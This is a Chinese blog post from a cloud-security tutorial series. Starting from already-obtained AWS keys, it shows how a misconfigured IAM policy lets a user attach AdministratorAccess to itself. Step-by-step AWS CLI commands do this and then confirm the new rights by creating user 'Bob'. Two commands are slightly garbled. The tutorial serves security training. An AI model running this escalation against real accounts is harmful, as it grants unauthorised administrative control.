AWS云安全系列 4 - IAM不严谨的权限 I

admin 2022年4月20日10:45:53云安全评论8 views899字阅读2分59秒阅读模式

国内云安全培训请点击原文或访问以下链接

https://www.yuque.com/u8047536/supvqp/ri4ft0


前提是已经获取了相关的密钥


步骤 1:将 AWS CLI配置为访问凭证


命令:

aws configure

AWS云安全系列 4 - IAM不严谨的权限 I


步骤 2: 列出附加到 XX用户的策略


aws iam list-attached-policies --user-name xx

AWS云安全系列 4 - IAM不严谨的权限 I


步骤 3:检查服务(Service)策略的策略详细信息


aws iam get-policy --policy-arn arn:aws:iam::6xxxxxxxxxx6:policy/Service


AWS云安全系列 4 - IAM不严谨的权限 I


步骤 4:查看 v1版本的服务(Service)策略的策略详细信息


aws iam get-policy-version --policy-arn arn:aws:iam::6xxxxxxxx6:policy/Service --version-id v1


AWS云安全系列 4 - IAM不严谨的权限 I


步骤 5:尝试创建一个名为 bob 的新用户


aws iam create-user --user-name Bob


AWS云安全系列 4 - IAM不严谨的权限 I


由于权限不足,用户创建失败。


步骤 6:获取管理员访问(AdministratorAccess)策略


 aws iam list-policies | grep 'AdministratorAccess'

AWS云安全系列 4 - IAM不严谨的权限 I


步骤 7:将管理员策略(AdministratorAccess)附加到当前用户,并通过列出策略进行确认


aws iam attach-user-policy --user-name xx --policy-arn arn:aws:iam::aws:policy/AdministratorAccessaws iam list-attached-policies --user-name xx


AWS云安全系列 4 - IAM不严谨的权限 I


步骤 8:尝试创建Bob的新用户来验证管理员访问权限


aws iam create-user -user-name Bob


AWS云安全系列 4 - IAM不严谨的权限 I


已成功执行特权操作


References:

 

1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)



原文始发于微信公众号(关注安全技术):AWS云安全系列 4 - IAM不严谨的权限 I

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日10:45:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  AWS云安全系列 4 - IAM不严谨的权限 I http://cn-sec.com/archives/929301.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: